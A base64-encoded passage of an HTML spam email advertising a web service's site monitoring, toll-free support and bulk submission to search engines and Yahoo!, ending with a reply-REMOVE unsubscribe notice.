ICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNy Yz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVza3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9 IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRo PSI0MCIgdmFsaWduPSJ0b3AiPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUg d2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1h Z2VzLzMuZ2lmIiB3aWR0aD0iMzAiIGhlaWdodD0iMjQiPjwvdGQ+DQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+ DQogICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAg ICAgIDx0ZCB3aWR0aD0iMzgzIj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRhYmxl IHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNCI+ DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICA8dGQ+PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjIiPjxiPjxmb250IGNv bG9yPSIjRkYwMDAwIj5TYWxlcyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBh dmFpbGFibGUgMjQgaG91cnMgYSBkYXkhPC9mb250PjwvYj48YnI+DQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgU28geW91IGNhbiBzbGVlcCwgd2Ugd2lsbCB3YXRjaCB5b3VyIHNp dGUgZXZlcnkgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMzAgbWludXRlcyAy NCBob3VycyBhIGRheS4gSWYgeW91ciBzaXRlIGlzIHRvIA0KICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIGdvIGRvd24gd2Ugd2lsbCBub3RpZnkgeW91IHRocm91Z2ggYSBlbWFpbCBv ciANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhbiBlbWFpbCBwYWdlLiBZb3Ug d2lsbCBuZXZlciBoYXZlIHRvIHdvcnJ5IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIGFib3V0IGxvc2luZyBzYWxlcyE8L2ZvbnQ+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4NCiAg ICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg PHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJ TkRPV1MvRGVza3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90 ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAg PC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgIDwv dHI+DQogICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICA8dGQgYmFj a2dyb3VuZD0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYi PjxpbWcgc3JjPSJodHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFnZXMvYmx1ZXBpeGVsLmdp ZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PGltZyANCnNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVy cy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvdGQ+DQog ICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAg ICAgICAgICAgICAgPHRkPiANCiAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQy NSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAg ICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRo PSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVz a3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAg ICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSI0MCIgdmFsaWduPSJ0b3AiPiANCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2Vs bHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0i aHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzLzQuZ2lmIiB3aWR0aD0iMzAiIGhlaWdo dD0iMjQiPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAgICAgICAgICAg IDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iMzgzIj4gDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgPHRhYmxlIHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNl bGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNCI+DQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+PGZvbnQgZmFj ZT0iQXJpYWwiIHNpemU9IjIiIGNvbG9yPSIjRkYwMDAwIj5XZSANCiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICBhcmUgYXZhaWxhYmxlIHZpYSBwaG9uZSBhbnl0aW1lLjwvZm9udD48 Zm9udCBmYWNlPSJBcmlhbCIgc2l6ZT0iMiI+PGJyPg0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIFlvdSBjYW4gYWx3YXlzIHJlYWNoIHVzIGlmIHRoZXJlIGFyZSBhbnkgcXVlc3Rp b25zIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9yIHByb2JsZW1zIHdpdGgg dGhlIHNlcnZpY2UuIFdlIGhhdmUgYSB0b2xsIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIGZyZWUgdGVsZXBob25lIG51bWJlciB3aGVyZSB5b3UgYXJlIGFibGUgdG8gDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3BlYWsgd2l0aCBhIHJlcHJlc2VudGF0aXZl LjwvZm9udD48L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAgICAgICAgICAgICAg ICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9IjEiIGJnY29sb3I9 IiMwMDAwRkYiPjxpbWcgc3JjPSJmaWxlOi8vL0MlN0MvV0lORE9XUy9EZXNrdG9wL2kvdHJhbnNw YXJlbnQuZ2lmIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L3RkPg0KICAgICAgICAgICAgICAgICAg ICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAg ICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAg IDx0cj4gDQogICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0cDovL3d3dy53ZWJj cmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjxp bWcgc3JjPSJodHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFnZXMvYmx1ZXBpeGVsLmdpZiIg d2lkdGg9IjEiIGhlaWdodD0iMSI+PGltZyANCnNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5j b20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRoPSI0MjUiIGhlaWdodD0iMSI+PC90ZD4NCiAg ICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAg ICAgICAgICAgICA8dGQ+IA0KICAgICAgICAgICAgICAgICAgICAgIDx0YWJsZSB3aWR0aD0iNDI1 IiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+DQogICAgICAgICAg ICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9 IjEiIGJnY29sb3I9IiMwMDAwRkYiPjxpbWcgc3JjPSJmaWxlOi8vL0MlN0MvV0lORE9XUy9EZXNr dG9wL2kvdHJhbnNwYXJlbnQuZ2lmIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L3RkPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9IjQwIiB2YWxpZ249InRvcCI+IA0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgIDx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBjZWxs c3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjQiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkPjxpbWcgc3JjPSJo dHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFnZXMvNS5naWYiIHdpZHRoPSIzMCIgaGVpZ2h0 PSIyNCI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIzODMiPiANCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2Vs bHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD48Zm9udCBmYWNl PSJBcmlhbCIgc2l6ZT0iMiIgY29sb3I9IiNGRjAwMDAiPkhhdmUgDQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgdmlhYmlsaXR5IHRvIGFsbCBzZWFyY2ggZW5naW5lcy48L2ZvbnQ+ PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjIiPjxicj4NCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICBTdWJtaXNzaW9uIGlzIHNlbnQgdG8gMTU1MCBzZWFyY2ggZW5naW5lcyBhbmQg DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZGlyZWN0b3JpZXMgZGFpbHkgaW4g b3JkZXIgdG8gYXZvaWQgaGF2aW5nIHlvdXIgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgc2l0ZSBkaXNtaXNzZWQgYnkgYW55IG9mIHRoZSBzZWFyY2ggZW5naW5lcy48L2ZvbnQ+ PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAg ICAgICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZG Ij48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVza3RvcC9pL3RyYW5zcGFyZW50Lmdp ZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwv dHI+DQogICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAg PC90ZD4NCiAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICA8dHI+IA0K ICAgICAgICAgICAgICAgICAgICA8dGQ+PGltZyBzcmM9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMu Y29tL2ltYWdlcy9ibHVlcGl4ZWwuZ2lmIiB3aWR0aD0iNDI1IiBoZWlnaHQ9IjEiPjwvdGQ+DQog ICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAg ICAgICAgICAgICAgPHRkPiANCiAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQy NSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAg ICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRo PSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVz a3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAg ICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSI0MCIgdmFsaWduPSJ0b3AiPiANCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2Vs bHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0i aHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzLzYuZ2lmIiB3aWR0aD0iMzAiIGhlaWdo dD0iMjQiPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAgICAgICAgICAg IDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iMzgzIj4gDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgPHRhYmxlIHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNl bGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNCI+DQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+PGZvbnQgZmFj ZT0iQXJpYWwiIHNpemU9IjIiPjxiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5TaXRlIA0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFByb2JsZW1zPzwvZm9udD48YnI+DQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9iPk5vIG5lZWQgdG8gd29ycnkuIE91ciBNZW1i ZXJzIGhhdmUgYWNjZXNzIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGEg U2l0ZSBUcmFjZXIgdGhhdCBpcyB1cGRhdGVkIGRhaWx5IHdoaWNoIA0KICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIHNob3cgdGhlIHNpdGWScyBmdW5jdGlvbmluZyBhbmQgaWYgdGhl cmUgYXJlIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFueSBwcm9ibGVtcyB3 aWxsIHNob3cgeW91IGhvdyB0byByZXBhaXIgdGhlbS48L2ZvbnQ+PC90ZD4NCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90 YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAg ICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iaHR0cDov L3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhl aWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAg ICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAg ICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAg ICAgICA8dGQ+PGltZyBzcmM9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMuY29tL2ltYWdlcy9ibHVl cGl4ZWwuZ2lmIiB3aWR0aD0iNDI1IiBoZWlnaHQ9IjEiPjwvdGQ+DQogICAgICAgICAgICAgICAg ICA8L3RyPg0KICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgPHRk PiANCiAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQyNSIgYm9yZGVyPSIwIiBj ZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAgICAgICAgICAgICAgICAg PHRyPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIj MDAwMEZGIj48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVza3RvcC9pL3RyYW5zcGFy ZW50LmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAg ICAgICAgPHRkIHdpZHRoPSI0MCIgdmFsaWduPSJ0b3AiPiANCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICA8dGFibGUgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNl bGxwYWRkaW5nPSI0Ij4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0cDovL3d3dy53ZWJj cmF3bGVycy5jb20vaW1hZ2VzLzcuZ2lmIiB3aWR0aD0iMzAiIGhlaWdodD0iMjQiPjwvdGQ+DQog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAg ICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAg ICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iMzgzIj4gDQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgPHRhYmxlIHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBj ZWxscGFkZGluZz0iNCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+IA0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9 IjIiPjxiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5TcGVhayANCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICB3aXRoIGV4cGVydHM8L2ZvbnQ+PGJyPg0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIDwvYj5EaXNjdXNzIHRoZSBsYXRlc3Qgc2VhcmNoIGVuZ2luZSBob3cg dG+ScyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aXRoIGV4cGVydHMgaW4g dGhlIGFyZWEgb2Ygc2VhcmNoIGVuZ2luZSBvcHRpbWl6YXRpb24uIA0KICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIDwvZm9udD48L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQg d2lkdGg9IjEiIGJnY29sb3I9IiMwMDAwRkYiPjxpbWcgc3JjPSJmaWxlOi8vL0MlN0MvV0lORE9X Uy9EZXNrdG9wL2kvdHJhbnNwYXJlbnQuZ2lmIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L3RkPg0K ICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICA8L3Rh YmxlPg0KICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgPC90cj4N CiAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNy Yz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRo PSI0MjUiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAg ICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICA8dGQ+IA0KICAgICAgICAgICAg ICAgICAgICAgIDx0YWJsZSB3aWR0aD0iNDI1IiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBj ZWxscGFkZGluZz0iMCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAg ICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9IjEiIGJnY29sb3I9IiMwMDAwRkYiPjxpbWcgc3Jj PSJmaWxlOi8vL0MlN0MvV0lORE9XUy9EZXNrdG9wL2kvdHJhbnNwYXJlbnQuZ2lmIiB3aWR0aD0i MSIgaGVpZ2h0PSIxIj48L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9 IjQwIiB2YWxpZ249InRvcCI+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0YWJsZSB3 aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjQiPg0K ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgPHRkPjxpbWcgc3JjPSJodHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFn ZXMvOC5naWYiIHdpZHRoPSIzMCIgaGVpZ2h0PSIyNCI+PC90ZD4NCiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAg ICAgPHRkIHdpZHRoPSIzODMiPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUg d2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDx0ZD48Zm9udCBmYWNlPSJBcmlhbCIgc2l6ZT0iMiI+PGI+PGZvbnQgY29s b3I9IiNGRjAwMDAiPllhaG9vISANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBz dWJtaXNzaW9uLjwvZm9udD48YnI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg PC9iPldlIHdpbGwgc3VibWl0IHlvdXIgc2l0ZSB0byBZYWhvbyEgYWZ0ZXIgDQogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgY2FyZWZ1bCBhbmFsaXphdGlvbiBvbiB0aGUgY2F0ZWdv cnkgdGhhdCB3aWxsIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJlc3QgZml0 IHdpdGggWWFob28hIDwvZm9udD48L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg PC90cj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAg ICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9 IjEiIGJnY29sb3I9IiMwMDAwRkYiPjxpbWcgc3JjPSJmaWxlOi8vL0MlN0MvV0lORE9XUy9EZXNr dG9wL2kvdHJhbnNwYXJlbnQuZ2lmIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L3RkPg0KICAgICAg ICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0K ICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAg ICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0 cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRoPSI0MjUi IGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAg ICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgIDwvdHI+DQogICAg ICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICA8dGQgd2lkdGg9IjE1NSIgdmFsaWduPSJ0b3Ai PiZuYnNwOzwvdGQ+DQogICAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDI1IiB2YWxpZ249InRvcCI+ Jm5ic3A7PC90ZD4NCiAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICA8dHI+IA0KICAgICAg ICAgICAgICA8dGQgd2lkdGg9IjU4MCIgdmFsaWduPSJ0b3AiIGNvbHNwYW49IjIiPiANCiAgICAg ICAgICAgICAgICA8ZGl2IGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRp Y2EsIHNhbnMtc2VyaWYiIHNpemU9Ii0yIj5UbyANCiAgICAgICAgICAgICAgICAgIGJlIHBlcm1h bmVudGx5IHJlbW92ZWQgZnJvbSBvdXIgbWFpbGluZyBsaXN0LCBjbGljayByZXBseSBhbmQgDQog ICAgICAgICAgICAgICAgICBlbnRlciBSRU1PVkUgaW4gdGhlIHN1YmplY3QgYm94LiBBbnkgb3Ro ZXIgbWV0aG9kIFdJTEwgTk9UIGdldCANCiAgICAgICAgICAgICAgICAgIHlvdSByZW1vdmVkISA8 L2ZvbnQ+PC9kaXY+DQogICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICA8L3RyPg0KICAg ICAgICAgIDwvdGFibGU+DQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGFsaWduPSJjZW50 ZXIiPjwvZGl2Pg0KICAgICAgICA8ZGl2IGFsaWduPSJjZW50ZXIiPjwvZGl2Pg0KICAgICAgICA8 cD48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIiBjb2xv cj0iIzAwMDAzMyI+IA0KICAgICAgICAgIDwvZm9udD48L3A+DQogICAgICA8L3RkPg0KICAgIDwv dHI+DQogICAgPHRyIGhlaWdodD0iMTAiPiANCiAgICAgIDx0ZCB2YWxpZ249ImJvdHRvbSIgY29s c3Bhbj0iMiIgcm93c3Bhbj0iMyIgaGVpZ2h0PSIxIiBiZ2NvbG9yPSIjOTk5OTk5Ij4mbmJzcDsg DQogICAgICA8L3RkPg0KICAgIDwvdHI+DQogICAgPHRyIGhlaWdodD0iOCI+IDwvdHI+DQogICAg 